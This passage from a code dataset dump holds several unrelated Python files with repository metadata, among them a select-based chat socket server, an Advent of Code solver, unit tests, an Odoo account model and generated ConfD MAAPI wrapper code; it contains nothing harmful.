that function detects\n addr which will be listen, prepares port and\n starts to receive a information\n \"\"\"\n addr_to_listen, port_to_listen = argument_parser()\n\n SERVER_SIDE_LOGGER.info(\n f'server launched, port to connect: {port_to_listen} '\n f'connection from address: {addr_to_listen} '\n f'(If address not defined, connection will be available without it)'\n )\n\n transfer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n transfer.bind((addr_to_listen, port_to_listen))\n transfer.settimeout(0.5)\n clients_online = []\n messages_queue = []\n transfer.listen(MAX_CONNECTIONS)\n\n while True:\n try:\n client_socket_box, addr_to_listen = transfer.accept()\n except OSError:\n pass\n else:\n SERVER_SIDE_LOGGER.info(f'connection with PC {addr_to_listen} stabilized')\n clients_online.append(client_socket_box)\n\n data_list_for_receiving = []\n data_list_to_send = []\n data_list_of_err_occured = []\n\n try:\n if clients_online:\n data_list_for_receiving, data_list_to_send, data_list_of_err_occured = \\\n select.select(clients_online, clients_online, [], 
0)\n except OSError:\n pass\n if data_list_for_receiving:\n for msg_by_client in data_list_for_receiving:\n try:\n analyzer(get_message(msg_by_client),\n messages_queue, msg_by_client)\n except:\n SERVER_SIDE_LOGGER.info(f'client {msg_by_client.getpeername()} '\n f'disconnected from server')\n clients_online.remove(msg_by_client)\n if messages_queue and data_list_to_send:\n message = {\n ACTION: MESSAGE,\n SENDER: messages_queue[0][0],\n TIME: time.time(),\n MESSAGE_TEXT: messages_queue[0][1]\n }\n del messages_queue[0]\n for client_from_queue in data_list_to_send:\n try:\n send_message(client_from_queue, message)\n except:\n SERVER_SIDE_LOGGER.info(f' client {client_from_queue.getpeername()} '\n f'disconnected from server')\n clients_online.remove(client_from_queue)\n\n\nif __name__ == '__main__':\n server_launcher()\n","repo_name":"machukhinktato/Python-client-server-applications","sub_path":"lesson_8/server_side.py","file_name":"server_side.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1933232371","text":"with open(\"C:/dev/adventofcode/7.txt\") as file:\r\n cmds = file.read().splitlines()\r\n\r\nwith open('C:/dev/adventofcode/7_test.txt') as testfile:\r\n testcmds = testfile.read().splitlines()\r\n\r\ndir_tree = {}\r\n\r\n\r\ndef get_parent_dir(value, dirs):\r\n # value is current_dir\r\n # dirs is dir_tree\r\n for entry in dirs:\r\n if isinstance(dirs[entry], dict):\r\n if value in dirs[entry].values():\r\n if dirs[entry]:\r\n return dirs[entry]\r\n else:\r\n return dir_tree['/']\r\n else:\r\n if get_parent_dir(value, dirs[entry]):\r\n return get_parent_dir(value, dirs[entry])\r\n\r\n\r\ndef count_directory_sizes(dirs):\r\n # start from dir_tree['/']\r\n for entry in dirs:\r\n if isinstance(dirs[entry], dict):\r\n dirs['size'] += dirs[entry]['size']\r\n count_directory_sizes(dirs[entry])\r\n\r\n\r\ndef count_max100kdirs_size(dirs):\r\n maxdirsize = 0\r\n for entry in dirs:\r\n if isinstance(dirs[entry], dict):\r\n if dirs[entry]['size'] <= 100000:\r\n maxdirsize += dirs[entry]['size']\r\n maxdirsize += count_max100kdirs_size(dirs[entry])\r\n return maxdirsize\r\n\r\n\r\nfor cmd in cmds:\r\n\r\n cmd = cmd.split(' ')\r\n\r\n if cmd[0] == '$':\r\n if cmd[1] == 'cd':\r\n if cmd[2] == '/':\r\n dir_tree['/'] = {\r\n 'size': 0,\r\n }\r\n current_dir = dir_tree['/']\r\n elif cmd[2] == '..':\r\n current_dir = get_parent_dir(current_dir, dir_tree)\r\n else:\r\n current_dir = current_dir['dir %s' % cmd[2]]\r\n elif cmd[1] == 'ls':\r\n pass\r\n elif cmd[0] == 'dir':\r\n current_dir['dir %s' % cmd[1]] = {\r\n 'size': 0,\r\n }\r\n elif cmd[0].isnumeric():\r\n current_dir[cmd[1]] = int(cmd[0])\r\n current_dir['size'] += int(cmd[0])\r\n\r\ncount_directory_sizes(dir_tree['/'])\r\nprint(count_max100kdirs_size(dir_tree))\r\n","repo_name":"krisztiantalan/adventofcode","sub_path":"adventofcode/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27472514608","text":"def verificação(string):\n string.lower()\n while True:\n lele = input(\"Digite uma opção: \").lower()\n for c in lele:\n if c in string:\n return True\n else:\n print(\"Tente novamente\")\n 
break\nprint(verificação(\"abcsdfagtewtasfasr\"))","repo_name":"batmit/Introducao-a-Python","sub_path":"#def/#15.py","file_name":"#15.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25332479636","text":"#!/usr/bin/python3\n\n\"\"\"Unit tests for review.py.\"\"\"\n\nimport unittest\nfrom models.review import Review\nfrom models.base_model import BaseModel\nimport models\n\n\nclass TestReview(unittest.TestCase):\n \"\"\"Unit tests for the Review class.\"\"\"\n\n def test_review_inherits_from_base_model(self):\n \"\"\"Test if Review inherits from BaseModel.\"\"\"\n self.assertTrue(issubclass(Review, BaseModel))\n\n def test_review_attributes(self):\n \"\"\"Test the attributes of the Review class.\"\"\"\n review = Review()\n self.assertTrue(hasattr(review, \"place_id\"))\n self.assertTrue(hasattr(review, \"user_id\"))\n self.assertTrue(hasattr(review, \"text\"))\n\n def test_review_attribute_types(self):\n \"\"\"Test the attribute types of the Review class.\"\"\"\n review = Review()\n self.assertIsInstance(review.place_id, str)\n self.assertIsInstance(review.user_id, str)\n self.assertIsInstance(review.text, str)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"abdel-moaty/AirBnB_clone","sub_path":"tests/test_models/test_review.py","file_name":"test_review.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72393056872","text":"def add_count(ban, key):\n if key in ban:\n ban[key] += 1\n else:\n ban[key] = 1\n\n\ndef report_process(id_list, report):\n result = dict()\n ban_list = dict()\n\n for s in report:\n user, ban_id = s.split()\n if user in result:\n if ban_id in result[user]: continue\n result[user].add(ban_id)\n add_count(ban_list, ban_id)\n else:\n result[user] = set([ban_id])\n add_count(ban_list, ban_id)\n\n return result, ban_list\n\n\ndef solution(id_list, report, k):\n answer = []\n\n result, ban_list = report_process(id_list, report)\n for user in id_list:\n cnt = 0\n for ban_id in result[user]:\n if ban_id in ban_list and ban_list[ban_id] >= k:\n cnt += 1\n answer.append(cnt)\n return answer\n\n\n\nprint(solution([\"muzi\", \"frodo\", \"apeach\", \"neo\"], [\"muzi frodo\", \"apeach frodo\", \"frodo neo\", \"muzi neo\", \"apeach muzi\"], 2))\n#\n# from collections import defaultdict\n#\n#\n# def solution(id_list, report, k):\n# dt = defaultdict(int)\n# reported = defaultdict(set)\n#\n# for ele in report:\n# a, b = ele.split()\n# reported[b].add(a)\n#\n# for key in reported:\n# if len(reported[key]) >= k:\n# for ele in reported[key]:\n# dt[ele] += 1\n#\n# return [dt[x] for x in id_list]","repo_name":"112224/algorithm","sub_path":"python3/P_신고 결과 받기.py","file_name":"P_신고 결과 받기.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72018049192","text":"from odoo import api, fields, models, _\nimport odoo.addons.decimal_precision as dp\n\nclass AccountAccount(models.Model):\n _inherit = \"account.account\"\n \n\n# mapping = {\n# 'balance': \"COALESCE(SUM(l.debit),0) - COALESCE(SUM(l.credit), 0) as balance\",\n# 'debit': \"COALESCE(SUM(l.debit), 0) as debit\",\n# 'credit': \"COALESCE(SUM(l.credit), 0) as credit\",\n# }\n \n @api.one\n def compute_values(self):\n for account in self:\n balance = 0.0\n credit = 0.0\n debit = 0.0\n search_domain = 
[('account_id','in',[self.id])]\n for val in self.env['account.move.line'].search(search_domain):\n if val.move_id.state == 'posted':\n balance += val.debit - val.credit\n credit += val.credit\n debit += val.debit\n account.balance = balance\n account.credit = credit\n account.debit = debit\n \n balance = fields.Float(compute=\"compute_values\", digits=dp.get_precision('Account'), string='Saldo')\n credit = fields.Float(compute=\"compute_values\",digits=dp.get_precision('Account'), string='Credito')\n debit = fields.Float(compute=\"compute_values\",digits=dp.get_precision('Account'), string='Debito')\n","repo_name":"falconsoft3d/chart_account_balance","sub_path":"chart_account_balance/models/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3633710307","text":"\n\n\nfrom a.infra.misc.enum_with_value import EnumWithValue\nfrom a.infra.basic.return_codes import ReturnCodes\nfrom a.infra.misc.init_guard import InitGuard\n\nfrom a.sys.confd.pyconfdlib.tag_values import TagValues\nfrom a.sys.confd.pyconfdlib.value import Value\nfrom a.sys.confd.pyconfdlib.key_path import KeyPath\n\nfrom test_generation_underscore_maapi_list_base_gen import TestGenerationUnderscoreMaapiListBase\nfrom test_generation_underscore_maapi_gen import BlinkyTestGenerationUnderscoreMaapi\n\nclass BlinkyTestGenerationUnderscoreMaapiList(TestGenerationUnderscoreMaapiListBase):\n def __init__ (self, logger):\n self.myInitGuard = InitGuard()\n self._log=logger.createLogger(\"sys-blinky-oper-example\",\"blinky-maapi-testGenerationUnderscore\")\n self.domain = None\n\n self.testGenerationUnderscores = {}\n self.testGenerationUnderscoreKeys = []\n\n def init (self, domain):\n self.myInitGuard.crashIfInitDone()\n for logFunc in self._log('init').debug3Func(): logFunc('called. domain=%s', domain)\n self.domain = domain\n self.myInitGuard.initDone()\n\n def newTestGenerationUnderscore (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('new-testgenerationunderscore').debug3Func(): logFunc('called.')\n testGenerationUnderscore = BlinkyTestGenerationUnderscoreMaapi(self._log)\n testGenerationUnderscore.init(self.domain)\n return testGenerationUnderscore\n\n def setTestGenerationUnderscoreObj (self, key, testGenerationUnderscoreObj):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('set-testgenerationunderscore-obj').debug3Func(): logFunc('called. key=%s, testGenerationUnderscoreObj=%s', key, testGenerationUnderscoreObj)\n if key not in self.testGenerationUnderscores:\n self.testGenerationUnderscoreKeys.append(key)\n self.testGenerationUnderscores[str(key)] = testGenerationUnderscoreObj\n\n def getTestGenerationUnderscoreObj (self, key):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('get-testgenerationunderscore-obj').debug3Func(): logFunc('called. key=%s', key)\n if str(key) in self.testGenerationUnderscores.keys():\n for logFunc in self._log('get-testgenerationunderscore-obj-done').debug3Func(): logFunc('Done. found key=%s, obj=%s', key, self.testGenerationUnderscores[str(key)])\n return self.testGenerationUnderscores[str(key)]\n for logFunc in self._log('get-testgenerationunderscore-obj-missing').errorFunc(): logFunc('testGenerationUnderscore %s not in testGenerationUnderscores. 
existing items: %s', key, self.testGenerationUnderscores.keys())\n return None\n\n def deleteTestGenerationUnderscore (self, key):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('delete-testgenerationunderscore').debug3Func(): logFunc('called. key=%s', key)\n if str(key) not in self.testGenerationUnderscoreKeys:\n for logFunc in self._log('delete-testGenerationUnderscore-not-found').warningFunc(): logFunc('key=%s is missing from the testGenerationUnderscoreKeys list', key)\n if str(key) in self.testGenerationUnderscores.keys():\n # internal problem - list & dictionary are not synced\n for logFunc in self._log('delete-testgenerationunderscore-not-found-but-in-dict').errorFunc(): logFunc('testGenerationUnderscores dictionary & testGenerationUnderscoreKeys list are out-of-sync. key %s exists in dict but not in list', key)\n return ReturnCodes.kGeneralError\n if str(key) not in self.testGenerationUnderscores.keys():\n # internal problem - list & dictionary are not synced\n for logFunc in self._log('delete-testGenerationUnderscore-not-found-but-in-list').errorFunc(): logFunc('testGenerationUnderscores dictionary & testGenerationUnderscoreKeys list are out-of-sync. key %s exists in list but not in dict', key)\n return ReturnCodes.kGeneralError\n\n self.testGenerationUnderscoreKeys.remove(str(key))\n del self.testGenerationUnderscores[str(key)]\n\n def hasTestGenerationUnderscoreObj (self, key):\n self.myInitGuard.isInitOrCrash()\n has = False\n if str(key) in self.testGenerationUnderscores.keys():\n if self.testGenerationUnderscores[str(key)]:\n has = True\n for logFunc in self._log('has-testgenerationunderscore-done').debug3Func(): logFunc('done. key=%s exists=%s', key, has)\n return has\n\n def getListKeys (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('get-list-keys').debug3Func(): logFunc('called. 
keys=%s', [str(x) for x in self.testGenerationUnderscoreKeys])\n return self.testGenerationUnderscoreKeys\n\n def requestConfigAndOper (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-config-and-oper').debug3Func(): logFunc('called.')\n for testGenerationUnderscore in self.testGenerationUnderscores.values():\n testGenerationUnderscore.requestConfigAndOper()\n\n def requestConfig (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-config').debug3Func(): logFunc('called.')\n for testGenerationUnderscore in self.testGenerationUnderscores.values():\n testGenerationUnderscore.requestConfig()\n\n def requestOper (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-oper').debug3Func(): logFunc('called.')\n for testGenerationUnderscore in self.testGenerationUnderscores.values():\n testGenerationUnderscore.requestOper()\n\n def clearAllRequested (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('clear-all-requested').debug3Func(): logFunc('called.')\n for testGenerationUnderscore in self.testGenerationUnderscores.values():\n testGenerationUnderscore.clearAllRequested()\n\n def _clearAllReadData (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('clear-all-read-data').debug3Func(): logFunc('called')\n for testGenerationUnderscore in self.testGenerationUnderscores.values():\n if testGenerationUnderscore:\n testGenerationUnderscore._clearAllReadData()\n\n def clearAllSet (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('clear-all-set').debug3Func(): logFunc('called, PARAMS')\n for key in self.testGenerationUnderscores.keys():\n if self.testGenerationUnderscores[key]:\n self.testGenerationUnderscores[key].clearAllSet()\n else:\n self.testGenerationUnderscoreKeys.remove(str(key))\n del self.testGenerationUnderscores[str(key)]\n\n def _getSelfKeyPath (self, lake\n , fish_\n \n , junkForTemplate):\n for logFunc in self._log('get-self-key-path').debug3Func(): logFunc('called. PARAMS. junkForTemplate=%s', junkForTemplate)\n keyPath = KeyPath()\n\n \n \n \n \n ancestorVal = Value()\n ancestorVal.setString(fish_);\n keyPath.addKeyPathPrefix(ancestorVal)\n \n \n xmlVal = Value()\n xmlVal.setXmlTag((\"fish\", \"http://qwilt.com/model/lake-example\", \"lake-example\"))\n keyPath.addKeyPathPrefix(xmlVal)\n \n \n ancestorVal = Value()\n ancestorVal.setString(lake);\n keyPath.addKeyPathPrefix(ancestorVal)\n \n \n xmlVal = Value()\n xmlVal.setXmlTag((\"lake\", \"http://qwilt.com/model/lake-example\", \"lake-example\"))\n keyPath.addKeyPathPrefix(xmlVal)\n \n\n for logFunc in self._log('get-self-key-path-done').debug3Func(): logFunc('done. keyPath=%s. 
PARAMS', keyPath)\n return keyPath\n\n def readListKeys (self\n , lake\n , fish_\n \n , trxContext=None):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('read-list-keys').debug3Func(): logFunc('called')\n\n # clear the old map\n self.testGenerationUnderscores = {}\n self.testGenerationUnderscoreKeys = []\n\n keyPath = self._getSelfKeyPath(lake, \n fish_, \n \n None)\n\n xmlVal = Value()\n xmlVal.setXmlTag((\"test-generation_underscore\", \"http://qwilt.com/model/lake-example\", \"lake-example\"))\n keyPath.addKeyPathPostfix(xmlVal)\n\n keys = []\n\n res = self.domain.readMaapiKeys(keyPath, keys, trxContext)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('read-list-keys-domain-failed').errorFunc(): logFunc('domain.readMaapiKeys() failed')\n return ReturnCodes.kGeneralError\n\n for key in keys:\n self.testGenerationUnderscoreKeys.append(key.getCannonicalStr())\n self.testGenerationUnderscores[key.getCannonicalStr()] = None\n\n return ReturnCodes.kOk\n\n def write (self\n , lake\n , fish_\n , trxContext=None\n ):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('write').debug3Func(): logFunc('called, PARAMS')\n return self._internalWrite(lake, fish_, \n trxContext)\n\n def read (self\n , lake\n , fish_\n \n , trxContext=None):\n for logFunc in self._log('read').debug3Func(): logFunc('called, PARAMS')\n return self._internalRead(lake, fish_, \n False,\n trxContext)\n\n def readAllOrFail (self\n , lake\n , fish_\n \n , trxContext=None):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('read-all-or-fail').debug3Func(): logFunc('called, PARAMS')\n return self._internalRead(lake, fish_, \n True,\n trxContext)\n\n def _internalWrite (self, \n lake, \n fish_, \n \n trxContext):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('internal-write').debug3Func(): logFunc('called.')\n\n tagValueList = TagValues()\n\n res = self._fillWriteTagValues(tagValueList)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('internal-write-fill-write-tag-value-failed').errorFunc(): logFunc('_fillWriteTagValues() failed')\n return ReturnCodes.kGeneralError\n\n itemsToDelete = []\n res = self._collectItemsToDelete(lake, \n fish_, \n \n itemsToDelete)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('write-collect-items-to-delete-failed').errorFunc(): logFunc('_collectItemsToDelete() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n keyPath = self._getSelfKeyPath(lake, \n fish_, \n \n None)\n\n res = self.domain.writeMaapi(tagValueList, keyPath, trxContext, itemsToDelete)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('write-domain-failed').errorFunc(): logFunc('domain.writeMaapi() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n for logFunc in self._log('internal-write-done').debug3Func(): logFunc('done. PARAMS')\n return ReturnCodes.kOk\n\n def _internalRead (self, \n lake, \n fish_, \n \n readAllOrFail,\n trxContext):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('internal-read').debug3Func(): logFunc('called. 
readAllOrFail=%s', readAllOrFail)\n\n if readAllOrFail:\n self._clearAllReadData()\n\n tagValueList = TagValues()\n\n res = self._fillReadTagValues(tagValueList)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('internal-read-fill-read-tag-values-failed').errorFunc(): logFunc('_fillReadTagValues() failed')\n return ReturnCodes.kGeneralError\n\n keyPath = self._getSelfKeyPath(lake, \n fish_, \n \n None)\n\n res = self.domain.readMaapi(tagValueList, keyPath, trxContext)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('internal-read-domain-failed').errorFunc(): logFunc('domain.readMaapi() failed.')\n return ReturnCodes.kGeneralError\n\n res = self._readTagValues(tagValueList, readAllOrFail)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('internal-read-read-tag-values-failed').errorFunc(): logFunc('_readTagValues() failed.')\n return ReturnCodes.kGeneralError\n\n for logFunc in self._log('internal-read-done').debug3Func(): logFunc('done. readAllOrFail=%s', readAllOrFail)\n return ReturnCodes.kOk\n\n def _collectItemsToDelete (self,\n lake, \n fish_, \n \n itemsToDelete):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('collect-items-to-delete').debug3Func(): logFunc('called: itemsToDelete=%s. PARAMS', itemsToDelete)\n\n for key in self.testGenerationUnderscores.keys():\n if self.testGenerationUnderscores[key]:\n res = self.testGenerationUnderscores[key]._collectItemsToDelete(lake, \n fish_, \n \n key,\n itemsToDelete)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('collect-items-to-delete-testGenerationUnderscore-failed').errorFunc(): logFunc('testGenerationUnderscoreObj._collectItemsToDelete() failed. key=%s. PARAMS', key)\n return ReturnCodes.kGeneralError\n\n else:\n keyPath = self._getSelfKeyPath(lake, \n fish_, \n \n None)\n xmlVal = Value()\n xmlVal.setXmlTag((\"test-generation_underscore\", \"http://qwilt.com/model/lake-example\", \"lake-example\"))\n keyPath.addKeyPathPostfix(xmlVal)\n valKey = Value()\n valKey.setString(key)\n keyPath.addKeyPathPostfix(valKey)\n\n itemsToDelete.append(keyPath)\n\n for logFunc in self._log('collect-items-to-delete-done').debug3Func(): logFunc('done: itemsToDelete=%s. PARAMS', itemsToDelete)\n return ReturnCodes.kOk\n\n def _fillWriteTagValues (self, tagValueList):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('fill-write-tag-values').debug3Func(): logFunc('called: tagValueList=%s', tagValueList)\n\n for key in self.testGenerationUnderscores.keys():\n if self.testGenerationUnderscores[key]:\n valBegin = Value()\n (tag, ns, prefix) = (\"test-generation_underscore\", \"http://qwilt.com/model/lake-example\", \"lake-example\")\n valBegin.setXmlBegin((tag, ns, prefix))\n tagValueList.push((tag, ns), valBegin)\n\n valKey = Value()\n valKey.setString(key)\n tagValueList.push((\"name\", \"http://qwilt.com/model/lake-example\"), valKey)\n\n tagValueListLen = tagValueList.getLen()\n\n res = self.testGenerationUnderscores[key]._fillWriteTagValues(tagValueList)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('fill-write-tag-values-testGenerationUnderscore-failed').errorFunc(): logFunc('testGenerationUnderscore._fillWriteTagValues() failed. 
key=%s', key)\n return ReturnCodes.kGeneralError\n\n if tagValueList.getLen() == tagValueListLen:\n # descendant didn't add anything, no need to read it.\n tagValueList.pop()\n tagValueList.pop()\n else:\n valEnd = Value()\n valEnd.setXmlEnd((tag, ns, prefix))\n tagValueList.push((tag, ns), valEnd)\n\n return ReturnCodes.kOk\n\n def _fillReadTagValues (self, tagValueList):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('fill-read-tag-values').debug3Func(): logFunc('called: tagValueList=%s', tagValueList)\n\n for key in self.testGenerationUnderscores.keys():\n if self.testGenerationUnderscores[key]:\n valBegin = Value()\n (tag, ns, prefix) = (\"test-generation_underscore\", \"http://qwilt.com/model/lake-example\", \"lake-example\")\n valBegin.setXmlBegin((tag, ns, prefix))\n tagValueList.push((tag, ns), valBegin)\n\n valKey = Value()\n valKey.setString(key)\n tagValueList.push((\"name\", \"http://qwilt.com/model/lake-example\"), valKey)\n\n tagValueListLen = tagValueList.getLen()\n\n res = self.testGenerationUnderscores[key]._fillReadTagValues(tagValueList)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('fill-read-tag-values-testGenerationUnderscore-failed').errorFunc(): logFunc('testGenerationUnderscore._fillReadTagValues() failed. key=%s', key)\n return ReturnCodes.kGeneralError\n\n if tagValueList.getLen() == tagValueListLen:\n # descendant didn't add anything, no need to read it.\n tagValueList.pop()\n tagValueList.pop()\n else:\n valEnd = Value()\n valEnd.setXmlEnd((tag, ns, prefix))\n tagValueList.push((tag, ns), valEnd)\n\n return ReturnCodes.kOk\n\n def _readTagValues (self, tagValueList, readAllOrFail):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('read-tag-values').debug3Func(): logFunc('called. tagValueList=%s, readAllOrFail=%s', tagValueList, readAllOrFail)\n\n res = ReturnCodes.kOk\n\n for key in self.testGenerationUnderscores.keys():\n if self.testGenerationUnderscores[key]:\n ((tag, ns), valBegin) = tagValueList.popFront()\n if (tag != \"test-generation_underscore\") or \\\n (ns != \"http://qwilt.com/model/lake-example\") or \\\n (valBegin.getType() != Value.kXmlBegin):\n for logFunc in self._log('reag-tag-values-unexpected-tag-begin').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',\n \"test-generation_underscore\", \"http://qwilt.com/model/lake-example\", Value.kXmlBegin,\n tag, ns, valBegin.getType())\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n\n ((tag, ns), valKey) = tagValueList.popFront()\n if (tag != \"name\") or \\\n (ns != \"http://qwilt.com/model/lake-example\"):\n for logFunc in self._log('reag-tag-values-unexpected-tag-key').errorFunc(): logFunc('got unexpected tag-value for key. expected: (%s, %s), got: (%s, %s)',\n \"name\", \"http://qwilt.com/model/lake-example\", tag, ns)\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n\n key = valKey.asString()\n if res != ReturnCodes.kOk:\n if readAllOrFail:\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n\n res = self.testGenerationUnderscores[key]._readTagValues(tagValueList, readAllOrFail)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('read-tag-values-testGenerationUnderscore-failed').errorFunc(): logFunc('testGenerationUnderscore._readTagValues() failed. 
key=%s', key)\n if readAllOrFail:\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n\n ((tag, ns), valEnd) = tagValueList.popFront()\n if (tag != \"test-generation_underscore\") or \\\n (ns != \"http://qwilt.com/model/lake-example\") or \\\n (valEnd.getType() != Value.kXmlEnd):\n for logFunc in self._log('reag-tag-values-unexpected-tag-end').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',\n \"test-generation_underscore\", \"http://qwilt.com/model/lake-example\", Value.kXmlEnd,\n tag, ns, valEnd.getType())\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n\n for logFunc in self._log('read-tag-values-done').debug3Func(): logFunc('done. tagValueList=%s, readAllOrFail=%s', tagValueList, readAllOrFail)\n return ReturnCodes.kOk\n\n\"\"\"\nExtracted from the below data: \n{\n \"node\": {\n \"containerClassName\": \"BlinkyTestGenerationUnderscoreMaapi\", \n \"name\": \"testGenerationUnderscore\", \n \"keyLeaf\": {\n \"varName\": \"testGenerationUnderscore\", \n \"yangName\": \"name\", \n \"typeHandler\": \"handler: StringHandler\"\n }, \n \"yangName\": \"test-generation_underscore\", \n \"namespace\": \"test_generation_underscore\", \n \"moduleYangNamespacePrefix\": \"lake-example\", \n \"className\": \"TestGenerationUnderscoreMaapiList\", \n \"importStatement\": \"from a.sys.blinky.example.lake_example.lake.fish_.test_generation_underscore.test_generation_underscore_maapi_list_gen import TestGenerationUnderscoreMaapiList\", \n \"baseClassName\": \"TestGenerationUnderscoreMaapiListBase\", \n \"moduleYangNamespace\": \"http://qwilt.com/model/lake-example\", \n \"containerModule\": \"test_generation_underscore_maapi_gen\", \n \"baseModule\": \"test_generation_underscore_maapi_list_base_gen\"\n }, \n \"ancestors\": [\n {\n \"moduleYangNamespacePrefix\": \"lake-example\", \n \"isCurrent\": false, \n \"yangName\": \"lake\", \n \"namespace\": \"lake\", \n \"isList\": true, \n \"moduleYangNamespace\": \"http://qwilt.com/model/lake-example\", \n \"keyLeaf\": {\n \"varName\": \"lake\", \n \"yangName\": \"name\", \n \"typeHandler\": \"handler: StringHandler\"\n }, \n \"name\": \"lake\"\n }, \n {\n \"moduleYangNamespacePrefix\": \"lake-example\", \n \"isCurrent\": false, \n \"yangName\": \"fish\", \n \"namespace\": \"fish_\", \n \"isList\": true, \n \"moduleYangNamespace\": \"http://qwilt.com/model/lake-example\", \n \"keyLeaf\": {\n \"varName\": \"fish_\", \n \"yangName\": \"id\", \n \"typeHandler\": \"handler: StringHandler\"\n }, \n \"name\": \"fish_\"\n }, \n {\n \"moduleYangNamespacePrefix\": \"lake-example\", \n \"isCurrent\": true, \n \"yangName\": \"test-generation_underscore\", \n \"namespace\": \"test_generation_underscore\", \n \"isList\": true, \n \"moduleYangNamespace\": \"http://qwilt.com/model/lake-example\", \n \"keyLeaf\": {\n \"varName\": \"testGenerationUnderscore\", \n \"yangName\": \"name\", \n \"typeHandler\": \"handler: StringHandler\"\n }, \n \"name\": \"test-generation_underscore\"\n }\n ], \n \"descendants\": [], \n \"conditionalDebugName\": null, \n \"operLeaves\": [], \n \"module\": {}, \n \"configLeaves\": [\n {\n \"moduleYangNamespace\": \"http://qwilt.com/model/lake-example\", \n \"moduleYangNamespacePrefix\": \"lake-example\", \n \"typeHandler\": \"handler: StringHandler\", \n \"memberName\": \"name\", \n \"yangName\": \"name\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": null, \n \"hasDefaultRef\": false\n }\n ], \n \"env\": {\n \"namespaces\": [\n \"a\", \n \"sys\", \n 
\"blinky\", \n \"example\", \n \"lake_example\"\n ]\n }, \n \"leaves\": [\n {\n \"moduleYangNamespace\": \"http://qwilt.com/model/lake-example\", \n \"moduleYangNamespacePrefix\": \"lake-example\", \n \"typeHandler\": \"handler: StringHandler\", \n \"memberName\": \"name\", \n \"yangName\": \"name\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": null, \n \"hasDefaultRef\": false\n }\n ], \n \"createTime\": \"2013\"\n}\n\"\"\"\n\n\n","repo_name":"afeset/miner2-tools","sub_path":"oscar/a/sys/blinky/example/lake_example/lake/fish_/test_generation_underscore/test_generation_underscore_maapi_list_gen.py","file_name":"test_generation_underscore_maapi_list_gen.py","file_ext":"py","file_size_in_byte":25801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26258358900","text":"import pandas as pd\nimport numpy as np\nimport geohash\nfrom sklearn.cluster import KMeans\nimport datetime as dt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef get_14_days_data(data):\n \"\"\"\n This function returns data from the past 14 days\n \"\"\"\n dem = data.sort_values([\"day\",\"timestamp\"])\n dem.index = range(len(dem))\n last_entry = dem.iloc[-1]\n last_day = last_entry.day\n last_time = dt.datetime.strptime(last_entry.timestamp,\"%H:%M\")\n next_time = last_time+dt.timedelta(minutes=15)\n next_time_str = str(next_time.hour)+\":\"+str(next_time.minute)\n last_14_day_time = last_time-dt.timedelta(days=14)+dt.timedelta(minutes=15)\n last_14_day_time_str = str(last_14_day_time.hour)+\":\"+str(last_14_day_time.minute)\n next_day = last_day+next_time.day-1\n last_14_day = next_day-14\n try:\n start_index = dem[(dem.day==last_14_day)&(dem.timestamp==last_14_day_time_str)].index[0]\n 